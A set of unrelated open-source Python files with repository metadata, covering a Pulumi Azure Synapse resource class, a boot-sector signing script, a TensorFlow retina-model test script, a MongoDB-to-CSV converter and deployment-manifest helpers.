sdk/python/pulumi_azure_native/synapse/v20210501/private_endpoint_connection.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/synapse/v20210501/private_endpoint_connection.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/synapse/v20210501/private_endpoint_connection.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PrivateEndpointConnectionInitArgs', 'PrivateEndpointConnection']
@pulumi.input_type
class PrivateEndpointConnectionInitArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
workspace_name: pulumi.Input[str],
private_endpoint_connection_name: Optional[pulumi.Input[str]] = None,
private_link_service_connection_state: Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']] = None):
"""
The set of arguments for constructing a PrivateEndpointConnection resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] workspace_name: The name of the workspace.
:param pulumi.Input[str] private_endpoint_connection_name: The name of the private endpoint connection.
:param pulumi.Input['PrivateLinkServiceConnectionStateArgs'] private_link_service_connection_state: Connection state of the private endpoint connection.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "workspace_name", workspace_name)
if private_endpoint_connection_name is not None:
pulumi.set(__self__, "private_endpoint_connection_name", private_endpoint_connection_name)
if private_link_service_connection_state is not None:
pulumi.set(__self__, "private_link_service_connection_state", private_link_service_connection_state)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="workspaceName")
def workspace_name(self) -> pulumi.Input[str]:
"""
The name of the workspace.
"""
return pulumi.get(self, "workspace_name")
@workspace_name.setter
def workspace_name(self, value: pulumi.Input[str]):
pulumi.set(self, "workspace_name", value)
@property
@pulumi.getter(name="privateEndpointConnectionName")
def private_endpoint_connection_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the private endpoint connection.
"""
return pulumi.get(self, "private_endpoint_connection_name")
@private_endpoint_connection_name.setter
def private_endpoint_connection_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_endpoint_connection_name", value)
@property
@pulumi.getter(name="privateLinkServiceConnectionState")
def private_link_service_connection_state(self) -> Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']]:
"""
Connection state of the private endpoint connection.
"""
return pulumi.get(self, "private_link_service_connection_state")
@private_link_service_connection_state.setter
def private_link_service_connection_state(self, value: Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']]):
pulumi.set(self, "private_link_service_connection_state", value)
class PrivateEndpointConnection(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
private_endpoint_connection_name: Optional[pulumi.Input[str]] = None,
private_link_service_connection_state: Optional[pulumi.Input[pulumi.InputType['PrivateLinkServiceConnectionStateArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A private endpoint connection
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] private_endpoint_connection_name: The name of the private endpoint connection.
:param pulumi.Input[pulumi.InputType['PrivateLinkServiceConnectionStateArgs']] private_link_service_connection_state: Connection state of the private endpoint connection.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] workspace_name: The name of the workspace.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PrivateEndpointConnectionInitArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A private endpoint connection
:param str resource_name: The name of the resource.
:param PrivateEndpointConnectionInitArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PrivateEndpointConnectionInitArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
private_endpoint_connection_name: Optional[pulumi.Input[str]] = None,
private_link_service_connection_state: Optional[pulumi.Input[pulumi.InputType['PrivateLinkServiceConnectionStateArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PrivateEndpointConnectionInitArgs.__new__(PrivateEndpointConnectionInitArgs)
__props__.__dict__["private_endpoint_connection_name"] = private_endpoint_connection_name
__props__.__dict__["private_link_service_connection_state"] = private_link_service_connection_state
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if workspace_name is None and not opts.urn:
raise TypeError("Missing required property 'workspace_name'")
__props__.__dict__["workspace_name"] = workspace_name
__props__.__dict__["name"] = None
__props__.__dict__["private_endpoint"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:synapse/v20210501:PrivateEndpointConnection"), pulumi.Alias(type_="azure-native:synapse:PrivateEndpointConnection"), pulumi.Alias(type_="azure-nextgen:synapse:PrivateEndpointConnection"), pulumi.Alias(type_="azure-native:synapse/v20190601preview:PrivateEndpointConnection"), pulumi.Alias(type_="azure-nextgen:synapse/v20190601preview:PrivateEndpointConnection"), pulumi.Alias(type_="azure-native:synapse/v20201201:PrivateEndpointConnection"), pulumi.Alias(type_="azure-nextgen:synapse/v20201201:PrivateEndpointConnection"), pulumi.Alias(type_="azure-native:synapse/v20210301:PrivateEndpointConnection"), pulumi.Alias(type_="azure-nextgen:synapse/v20210301:PrivateEndpointConnection"), pulumi.Alias(type_="azure-native:synapse/v20210401preview:PrivateEndpointConnection"), pulumi.Alias(type_="azure-nextgen:synapse/v20210401preview:PrivateEndpointConnection"), pulumi.Alias(type_="azure-native:synapse/v20210601:PrivateEndpointConnection"), pulumi.Alias(type_="azure-nextgen:synapse/v20210601:PrivateEndpointConnection"), pulumi.Alias(type_="azure-native:synapse/v20210601preview:PrivateEndpointConnection"), pulumi.Alias(type_="azure-nextgen:synapse/v20210601preview:PrivateEndpointConnection")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(PrivateEndpointConnection, __self__).__init__(
'azure-native:synapse/v20210501:PrivateEndpointConnection',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'PrivateEndpointConnection':
"""
Get an existing PrivateEndpointConnection resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = PrivateEndpointConnectionInitArgs.__new__(PrivateEndpointConnectionInitArgs)
__props__.__dict__["name"] = None
__props__.__dict__["private_endpoint"] = None
__props__.__dict__["private_link_service_connection_state"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["type"] = None
return PrivateEndpointConnection(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="privateEndpoint")
def private_endpoint(self) -> pulumi.Output[Optional['outputs.PrivateEndpointResponse']]:
"""
The private endpoint which the connection belongs to.
"""
return pulumi.get(self, "private_endpoint")
@property
@pulumi.getter(name="privateLinkServiceConnectionState")
def private_link_service_connection_state(self) -> pulumi.Output[Optional['outputs.PrivateLinkServiceConnectionStateResponse']]:
"""
Connection state of the private endpoint connection.
"""
return pulumi.get(self, "private_link_service_connection_state")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Provisioning state of the private endpoint connection.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
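# Illustrative usage sketch (not part of the generated SDK, and never executed here):
# the resource group, workspace and connection names are made-up values, and the
# PrivateLinkServiceConnectionStateArgs fields assume the usual Azure connection-state
# shape (status / description).
def _example_private_endpoint_connection() -> 'PrivateEndpointConnection':
    return PrivateEndpointConnection(
        "examplePrivateEndpointConnection",
        resource_group_name="example-rg",
        workspace_name="example-synapse-workspace",
        private_endpoint_connection_name="example-connection",
        private_link_service_connection_state=PrivateLinkServiceConnectionStateArgs(
            status="Approved",
            description="Approved by automation"))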
| 52.640351
| 1,283
| 0.707549
|
af19bcae59618400bbb5873efaf8ea86b76a5ac8
| 628
|
py
|
Python
|
src/boot/sign.py
|
Sinap/PotatOS
|
479e16ebaa826e709960e48dd2fb5812b90c7bc1
|
[
"MIT"
] | null | null | null |
src/boot/sign.py
|
Sinap/PotatOS
|
479e16ebaa826e709960e48dd2fb5812b90c7bc1
|
[
"MIT"
] | null | null | null |
src/boot/sign.py
|
Sinap/PotatOS
|
479e16ebaa826e709960e48dd2fb5812b90c7bc1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function
import os
import sys
def main():
boot = sys.argv[1]
if not os.path.exists(boot):
print('File %s does not exist' % boot, file=sys.stderr)
exit(1)
with open(boot, 'rb') as f:
buff = f.read()
buff_len = len(buff)
    if buff_len > 510:
        print('Boot block too large: %d bytes (max 510)' % buff_len,
              file=sys.stderr)
        exit(1)
    # pad the image to 510 bytes and append the 0x55AA boot signature
    buff += b"\0" * (510 - buff_len)
    buff += b"\x55\xAA"
with open(boot, 'wb') as f:
f.write(buff)
if __name__ == '__main__':
main()
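# Illustrative check (not part of the original script, never called here): after signing,
# a valid image should be exactly 512 bytes and end with the 0x55AA boot signature.
# The default path is an assumption.
def _verify_signed_image(path='boot.bin'):
    with open(path, 'rb') as f:
        img = f.read()
    return len(img) == 512 and img[-2:] == b"\x55\xAA"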
| 22.428571
| 71
| 0.533439
|
f07f43f67fb324e85689c9998c32b0dbc5983882
| 843
|
py
|
Python
|
config/deep_bidir_lstm_2x128.py
|
dheeraj091/sememtic
|
8aa526c12dd96e900414f90f1d78d034ffdf531e
|
[
"MIT"
] | 459
|
2016-02-29T22:23:05.000Z
|
2022-03-21T20:14:08.000Z
|
config/deep_bidir_lstm_2x128.py
|
yifan/DeepMind-Teaching-Machines-to-Read-and-Comprehend
|
8ad50e9f2562b1fd055939e8582f07e46f54b1ef
|
[
"MIT"
] | 11
|
2016-03-11T14:15:01.000Z
|
2018-12-05T15:17:23.000Z
|
config/deep_bidir_lstm_2x128.py
|
yifan/DeepMind-Teaching-Machines-to-Read-and-Comprehend
|
8ad50e9f2562b1fd055939e8582f07e46f54b1ef
|
[
"MIT"
] | 130
|
2016-03-02T15:51:32.000Z
|
2022-03-21T20:13:59.000Z
|
from blocks.algorithms import BasicMomentum, AdaDelta, RMSProp, Adam, CompositeRule, StepClipping
from blocks.initialization import IsotropicGaussian, Constant
from blocks.bricks import Tanh
from model.deep_bidir_lstm import Model
batch_size = 32
sort_batch_count = 20
shuffle_questions = True
shuffle_entities = True
concat_ctx_and_question = True
concat_question_before = True ## should not matter for bidirectional network
embed_size = 200
lstm_size = [128, 128]
skip_connections = True
n_entities = 550
out_mlp_hidden = []
out_mlp_activations = []
step_rule = CompositeRule([RMSProp(decay_rate=0.95, learning_rate=5e-5),
BasicMomentum(momentum=0.9)])
dropout = 0.1
w_noise = 0.05
valid_freq = 1000
save_freq = 1000
print_freq = 100
weights_init = IsotropicGaussian(0.01)
biases_init = Constant(0.)
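# Illustrative note (not part of the original config): StepClipping is imported above but
# never used; composing it with the existing rule would look like the line below.  The
# clipping threshold of 10 is an arbitrary assumption.
step_rule_with_clipping = CompositeRule([StepClipping(10.), step_rule])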
| 22.184211
| 97
| 0.768683
|
bb7127404cfd6a0ee628556a0730e10a5ce8ab97
| 10,716
|
py
|
Python
|
assignment3/test_retina.py
|
dbirman/cs375
|
7aeac1ed57eff74cbecb3e1091b01f00d34629a8
|
[
"MIT"
] | null | null | null |
assignment3/test_retina.py
|
dbirman/cs375
|
7aeac1ed57eff74cbecb3e1091b01f00d34629a8
|
[
"MIT"
] | null | null | null |
assignment3/test_retina.py
|
dbirman/cs375
|
7aeac1ed57eff74cbecb3e1091b01f00d34629a8
|
[
"MIT"
] | 2
|
2017-12-02T01:46:28.000Z
|
2018-01-08T21:36:58.000Z
|
from __future__ import division, print_function, absolute_import
import os, sys
from collections import OrderedDict
import numpy as np
import pymongo as pm
import tensorflow as tf
from tfutils import base, data, model, optimizer, utils
import copy
NUM_GPUS = 1
if not isinstance(NUM_GPUS, list):
DEVICES = ['/gpu:' + str(i) for i in range(NUM_GPUS)]
else:
DEVICES = ['/gpu:' + str(i) for i in range(len(NUM_GPUS))]
MODEL_PREFIX = 'model_0'
MB_SIZE = 2000
# Data parameters
INPUT_BATCH_SIZE = 1024 # queue size
IMAGE_SIZE_RESIZE = 50
WN_DATA_PATH = '/datasets/deepretina_data/tf_records/whitenoise'
NS_DATA_PATH = '/datasets/deepretina_data/tf_records/naturalscene'
# data provider
class retinaTF(data.TFRecordsParallelByFileProvider):
def __init__(self,
source_dirs,
resize=IMAGE_SIZE_RESIZE,
**kwargs
):
if resize is None:
self.resize = 50
else:
self.resize = resize
postprocess = {'images': [], 'labels': []}
postprocess['images'].insert(0, (tf.decode_raw, (tf.float32, ), {}))
postprocess['images'].insert(1, (tf.reshape, ([-1] + [50, 50, 40], ), {}))
postprocess['images'].insert(2, (self.postproc_imgs, (), {}))
postprocess['labels'].insert(0, (tf.decode_raw, (tf.float32, ), {}))
postprocess['labels'].insert(1, (tf.reshape, ([-1] + [5], ), {}))
super(retinaTF, self).__init__(
source_dirs,
postprocess=postprocess,
**kwargs
)
def postproc_imgs(self, ims):
def _postprocess_images(im):
im = tf.image.resize_images(im, [self.resize, self.resize])
return im
return tf.map_fn(lambda im: _postprocess_images(im), ims, dtype=tf.float32)
def ln(inputs, train=True, prefix=MODEL_PREFIX, devices=DEVICES, num_gpus=NUM_GPUS, seed=0, cfg_final=None):
params = OrderedDict()
batch_size = inputs['images'].get_shape().as_list()[0]
params['train'] = train
params['batch_size'] = batch_size
# implement your LN model here
flat = tf.contrib.layers.flatten(inputs['images'])
num_units = 5
out = tf.layers.dense(
flat,
num_units,
activation=tf.nn.softplus,
kernel_regularizer=tf.contrib.layers.l2_regularizer(1E-3))
return out, params
def dense_(inputs, shape, activation=tf.nn.softplus):
"""
Args:
shape: [input, output]
"""
weights = tf.get_variable(shape=shape, dtype=tf.float32,
initializer=tf.random_normal_initializer(stddev=0.05),
regularizer=tf.contrib.layers.l2_regularizer(1e-3),
name='weights')
biases = tf.get_variable('biases', [shape[1]], tf.float32, tf.zeros_initializer())
FC = tf.nn.xw_plus_b(inputs, weights, biases, name='FC')
if activation is not None:
out = activation(FC)
else:
out = FC
return out
def conv_(inp, conv_shape, stride, padding='SAME', reg=None):
if reg is not None:
weights = tf.get_variable(shape=conv_shape, dtype=tf.float32,
initializer=tf.contrib.layers.xavier_initializer(),
regularizer=tf.contrib.layers.l2_regularizer(reg),
name='weights')
else:
weights = tf.get_variable(shape=conv_shape, dtype=tf.float32,
initializer=tf.contrib.layers.xavier_initializer(), name='weights')
    conv = tf.nn.conv2d(inp, weights, [1, stride, stride, 1], padding=padding, name='conv')
biases = tf.get_variable(initializer=tf.zeros_initializer(), shape=[conv_shape[3]], dtype=tf.float32, name='bias')
out = tf.nn.bias_add(conv, biases)
return out, weights
def gaussian_noise_(input_layer, std):
noise = tf.random_normal(shape=tf.shape(input_layer), mean=0.0, stddev=std, dtype=tf.float32)
return input_layer + noise
def relu_(inp):
return tf.nn.relu(inp)
def cnn(inputs, train=True, prefix=MODEL_PREFIX, devices=DEVICES, num_gpus=NUM_GPUS, seed=0, cfg_final=None):
params = OrderedDict()
batch_size = inputs['images'].get_shape().as_list()[0]
params['train'] = train
params['batch_size'] = batch_size
with tf.variable_scope('conv1'):
temp, c1_k = conv_(inputs['images'],[15,15,40,16],1,padding='VALID')
if train:
conv1 = relu_(gaussian_noise_(temp,std=0.1))
else:
conv1 = relu_(temp)
with tf.variable_scope('conv2'):
temp, c2_k = conv_(conv1,[9,9,16,8],1,padding='VALID',reg=1e-3)
if train:
conv2 = relu_(gaussian_noise_(temp,std=0.1))
else:
conv2 = relu_(temp)
with tf.variable_scope('fc'):
flat_len = np.product(conv2.shape.as_list()[1:])
flatten = tf.reshape(conv2, [-1, flat_len])
out = dense_(flatten,[flat_len,5])
return out, params
def pearson_agg(results):
# concatenate results along batch dimension
true_rates = np.concatenate(results['labels'], axis=0)
pred_rates = np.concatenate(results['pred'], axis=0)
true_std = np.std(true_rates, axis=0)
pred_std = np.std(pred_rates, axis=0)
true_mean = np.mean(true_rates, axis=0)
pred_mean = np.mean(pred_rates, axis=0)
r = np.mean( (true_rates - true_mean) * (pred_rates - pred_mean), axis=0 ) / (true_std * pred_std)
return {'pearson' : r}
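# Small self-contained sanity check for the aggregator above (not part of the original
# script and never called here); the helper name and toy shapes are illustrative only.
def _pearson_agg_smoke_test():
    rng = np.random.RandomState(0)
    labels = rng.rand(100, 5).astype(np.float32)
    preds = 2.0 * labels + 1.0  # perfectly linearly correlated, cell by cell
    out = pearson_agg({'labels': [labels], 'pred': [preds]})
    assert np.allclose(out['pearson'], 1.0)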
def online_agg(agg_res, res, step):
if agg_res is None:
agg_res = {k: [] for k in res}
for k, v in res.items():
agg_res[k].append(v)
return agg_res
def return_outputs(inputs, outputs, targets, **kwargs):
"""
Illustrates how to extract desired targets from the model
"""
retval = {}
retval['labels'] = inputs['labels']
retval['pred'] = outputs
return retval
# model parameters
default_params = {
'save_params': {
'host': '35.199.154.71',
'port': 24444,
'dbname': 'deepretina',
'exp_id': 'trainval0',
},
'load_params': {
'host': '35.199.154.71',
'port': 24444,
'do_restore': True,
'query': None
},
'model_params': {
'func': ln,
'num_gpus': NUM_GPUS,
'devices': DEVICES,
'prefix': MODEL_PREFIX
},
'validation_params': {
'whitenoise_pearson': {
'data_params': {
'func': retinaTF,
'source_dirs': [os.path.join(WN_DATA_PATH, 'images'), os.path.join(WN_DATA_PATH, 'labels')],
'resize': IMAGE_SIZE_RESIZE,
'batch_size': INPUT_BATCH_SIZE,
'file_pattern': 'test*.tfrecords',
'n_threads': 4
},
'targets': {
'func': return_outputs,
'targets': ['labels'],
},
'queue_params': {
'queue_type': 'fifo',
'batch_size': MB_SIZE,
'capacity': 11*INPUT_BATCH_SIZE,
'min_after_dequeue': 10*INPUT_BATCH_SIZE,
'seed': 0,
},
'num_steps': 5957 // MB_SIZE + 1,
'agg_func': pearson_agg,
'online_agg_func': online_agg
},
'naturalscene_pearson': {
'data_params': {
'func': retinaTF,
'source_dirs': [os.path.join(NS_DATA_PATH, 'images'), os.path.join(NS_DATA_PATH, 'labels')],
'resize': IMAGE_SIZE_RESIZE,
'batch_size': INPUT_BATCH_SIZE,
'file_pattern': 'test*.tfrecords',
'n_threads': 4
},
'targets': {
'func': return_outputs,
'targets': ['labels'],
},
'queue_params': {
'queue_type': 'fifo',
'batch_size': MB_SIZE,
'capacity': 11*INPUT_BATCH_SIZE,
'min_after_dequeue': 10*INPUT_BATCH_SIZE,
'seed': 0,
},
'num_steps': 5956 // MB_SIZE + 1,
'agg_func': pearson_agg,
'online_agg_func': online_agg
}
},
'log_device_placement': False, # if variable placement has to be logged
}
def test_ln(steps=None, train_stimulus='whitenoise'):
params = copy.deepcopy(default_params)
for param in ['save_params', 'load_params']:
params[param]['dbname'] = 'ln_model'
params[param]['collname'] = train_stimulus
params[param]['exp_id'] = 'trainval0'
params['model_params']['func'] = ln
# determine time steps
if steps is None:
conn = pm.MongoClient(port=params['load_params']['port'])
coll = conn[params['load_params']['dbname']][train_stimulus + '.files']
steps = [i['step'] for i in coll.find({'exp_id': 'trainval0',
'train_results': {'$exists': True}}, projection=['step'])]
for step in steps:
print("Running Step %s" % step)
params['load_params']['query'] = {'step': step}
params['save_params']['exp_id'] = 'testval_step%s' % step
base.test_from_params(**params)
def test_cnn(steps=None, train_stimulus='whitenoise'):
params = copy.deepcopy(default_params)
params['model_params']['func'] = cnn
for param in ['save_params', 'load_params']:
params[param]['dbname'] = 'cnn'
params[param]['collname'] = train_stimulus
params[param]['exp_id'] = 'trainval0'
if steps is None:
conn = pm.MongoClient(port=params['load_params']['port'])
coll = conn[params['load_params']['dbname']][train_stimulus + '.files']
steps = [i['step'] for i in coll.find({'exp_id': 'trainval0',
'train_results': {'$exists': True}}, projection=['step'])]
print(params['load_params'])
for step in steps:
# determine time steps
#print("Running Step %s" % step)
params['load_params']['query'] = {'step': step}
params['save_params']['exp_id'] = 'testval_step%s' % step
#base.test_from_params(**params)
if __name__ == '__main__':
# Set stim_type (at the top of this file) to change the data input to the models.
    # Set the stimulus param below to load the model trained on [stimulus].
# i.e. stim_type = whitenoise, stimulus = naturalscene means calculating the correlation coefficient
# for whitenoise data on the model trained on naturalscene data.
# Set the step below to change the model checkpoint.
for stimulus in ['whitenoise','naturalscene']:
test_cnn(train_stimulus=stimulus)
#test_ln(train_stimulus=stimulus)
| 35.483444
| 118
| 0.587346
|
d1eaa762ec6081cf1c844c36c7ccbf0b4a46b22c
| 3,125
|
py
|
Python
|
cmongo2csv.py
|
stpettersens/cmongo2csv
|
0b15a3f375a3e84322e96ac070d469ed6ffdd827
|
[
"MIT"
] | null | null | null |
cmongo2csv.py
|
stpettersens/cmongo2csv
|
0b15a3f375a3e84322e96ac070d469ed6ffdd827
|
[
"MIT"
] | null | null | null |
cmongo2csv.py
|
stpettersens/cmongo2csv
|
0b15a3f375a3e84322e96ac070d469ed6ffdd827
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
cmongo2csv
Utility to convert a MongoDB JSON dump to a CSV file.
Copyright 2015 Sam Saint-Pettersen.
Licensed under the MIT/X11 License.
Use -h switch for usage information.
"""
import sys
import re
import json
import argparse
signature = 'cmongo2csv 1.0.1 (https://github.com/stpettersens/cmongo2csv)'
def displayVersion():
print('\n' + signature)
def displayInfo():
print(__doc__)
def cmongo2csv(file, out, separator, verbose, version, info):
if len(sys.argv) == 1:
displayInfo()
sys.exit(0)
if file == None and out == None:
if verbose == False and version == True and info == False:
displayVersion()
elif verbose == False and version == False and info == True:
displayInfo()
sys.exit(0)
    if out == None: out = re.sub(r'\.json$', '.csv', file)
if file.endswith('.json') == False:
print('Input file is not a MongoDB dump.')
sys.exit(1)
if out.endswith('.csv') == False and out.endswith('.tsv') == False:
print('Output file is not a CSV or TSV file.')
sys.exit(1)
if separator == None: separator = ','
if out.endswith('.tsv'): separator = '\t'
f = open(file, 'r')
lines = f.readlines()
f.close()
fields = []
inserts = []
headers = True
for line in lines:
ii = ''
inputJson = json.loads(line)
for key, value in inputJson.iteritems():
fvalue = re.sub('\{|\}|\'', '', str(value))
pattern = re.compile('u\$oid')
if pattern.match(str(fvalue)):
if headers: fields.append(str(key))
v = re.split(':', str(fvalue), 1)
v = re.sub('\u', '', v[1], 1)
v = re.sub('\s', '', v, 1)
ii += 'ObjectId({0}){1}'.format(v, separator)
continue
pattern = re.compile('u\$date')
if pattern.match(str(fvalue)):
if headers: fields.append(str(key))
v = re.split(':', str(fvalue), 1)
v = re.sub('\u', '', v[1], 1)
v = re.sub('\s', '', v, 1)
v = ''.join(v)
ii += '{0}{1}'.format(v, separator)
continue
pattern = re.compile('[\w\s]+')
if pattern.match(str(fvalue)):
if headers: fields.append(str(key))
ii += '{0}{1}'.format(fvalue, separator)
ii = ii[:-1]
inserts.append(ii)
ii = ''
headers = False
if verbose:
print('\nGenerating CSV file: \'{0}\' from\nMongoDB JSON dump file: \'{1}\''
.format(out, file))
f = open(out, 'w')
f.write(separator.join(fields) + '\n')
for insert in inserts:
f.write(insert + '\n')
f.close()
# Handle any command line arguments.
parser = argparse.ArgumentParser(description='Utility to convert a MongoDB JSON dump to a CSV file.')
parser.add_argument('-f', '--file', action='store', dest='file', metavar="FILE")
parser.add_argument('-o', '--out', action='store', dest='out', metavar="OUT")
parser.add_argument('-s', '--separator', action='store', dest='separator', metavar="SEPARATOR")
parser.add_argument('-l', '--verbose', action='store_true', dest='verbose')
parser.add_argument('-v', '--version', action='store_true', dest='version')
parser.add_argument('-i', '--info', action='store_true', dest='info')
argv = parser.parse_args()
cmongo2csv(argv.file, argv.out, argv.separator, argv.verbose, argv.version, argv.info)
| 26.041667
| 101
| 0.6304
|
0f9ec0084e77fcdc23449679ce4618bdd7e314e8
| 924
|
py
|
Python
|
Maverick/Metadata.py
|
loftwah/Maverick
|
d0d3da922d0ee6fe2383301d16731890aef4e8ee
|
[
"MIT"
] | null | null | null |
Maverick/Metadata.py
|
loftwah/Maverick
|
d0d3da922d0ee6fe2383301d16731890aef4e8ee
|
[
"MIT"
] | null | null | null |
Maverick/Metadata.py
|
loftwah/Maverick
|
d0d3da922d0ee6fe2383301d16731890aef4e8ee
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import moment
class Metadata(dict):
"""Metadata
    Metadata for posts and pages
"""
def __init__(self, fr):
dict.__init__({})
self["title"] = str(fr.get("title", ""))
self["slug"] = str(fr.get("slug", self["title"]))
self["date"] = moment.date(str(fr.get("date", ""))).locale('Asia/Shanghai')
self["layout"] = str(fr.get("layout", "post"))
self["status"] = str(fr.get("status", "publish"))
self["author"] = str(fr.get("author", ""))
self["banner"] = str(fr.get("banner", ""))
self["excerpt"] = str(fr.get("excerpt", ""))
self["path"] = ""
self["showfull"] = bool(fr.get("showfull", False))
self["comment"] = bool(fr.get("comment", True))
        # Parse the contained tags (unordered)
self["tags"] = fr.get("tags", []) or []
        # Parse the contained categories (ordered)
self["categories"] = fr.get("categories", []) or []
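# Illustrative sketch (not part of Maverick itself, never called here): building a
# Metadata object from a plain dict standing in for parsed front matter; the field
# values and the date string format are assumptions.
def _example_metadata():
    front_matter = {
        "title": "Hello World",
        "date": "2019-06-01 12:00:00",
        "tags": ["demo"],
        "categories": ["notes"],
    }
    meta = Metadata(front_matter)
    # "slug" falls back to the title and "layout" defaults to "post"
    return meta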
| 28.875
| 83
| 0.506494
|
9b9a17fe44a5d339a116381449f5d3aa618c65d1
| 2,303
|
py
|
Python
|
burlap/manifest.py
|
tutordelphia/burlap
|
38e5cef10a480cd9931bee3e88d91cb58482bf41
|
[
"MIT"
] | null | null | null |
burlap/manifest.py
|
tutordelphia/burlap
|
38e5cef10a480cd9931bee3e88d91cb58482bf41
|
[
"MIT"
] | null | null | null |
burlap/manifest.py
|
tutordelphia/burlap
|
38e5cef10a480cd9931bee3e88d91cb58482bf41
|
[
"MIT"
] | null | null | null |
"""
Tracks changes between deployments.
"""
from __future__ import print_function
from pprint import pprint
#TODO: remove? largely deprecated, use the deploy module instead
from burlap import common
from burlap.decorators import task, runs_once
from burlap import Satchel
class ManifestSatchel(Satchel):
name = 'manifest'
@task
@runs_once
def show_current(self, name):
ret = self.get_current(name)
print('Current manifest for %s:' % name)
pprint(ret, indent=4)
@task
@runs_once
def show_last(self, name):
ret = self.get_last(name)
print('Last manifest for %s:' % name)
pprint(ret, indent=4)
@task
@runs_once
def get_current(self, name):
name = name.strip().lower()
func = common.manifest_recorder[name]
return func()
@task
@runs_once
def get_last(self, name):
from burlap.deploy import deploy as deploy_satchel
name = common.assert_valid_satchel(name)
last_thumbprint = deploy_satchel.get_previous_thumbprint()
#print('manifest.name:', name)
#print('manifest.last_thumbprint:')
#pprint(last_thumbprint, indent=4)
if last_thumbprint:
if name in last_thumbprint:
return last_thumbprint.get(name, type(self.genv)())
return type(self.genv)()
@task
@runs_once
def changed(self, name):
from burlap.deploy import deploy
name = name.strip().lower()
if name not in common.manifest_recorder:
print('No manifest recorder has been registered for component "%s"' % name)
else:
last_thumbprint = deploy.get_previous_thumbprint()
if last_thumbprint:
if name in last_thumbprint:
last_manifest = last_thumbprint[name]
current_manifest = common.manifest_recorder[name]()
if last_manifest == current_manifest:
print('No')
return False
print('Yes')
return True
print('Yes, first deployment for this component.')
return True
print('Yes, first deployment.')
return True
manifest = ManifestSatchel()
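# Illustrative sketch (not part of burlap, never called here): how the satchel instance
# above is typically driven; the component name "apache" is an assumption and only makes
# sense if a manifest recorder has been registered for it.
def _example_check_component():
    if manifest.changed('apache'):
        print('apache configuration differs from the last deployment')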
| 30.302632
| 87
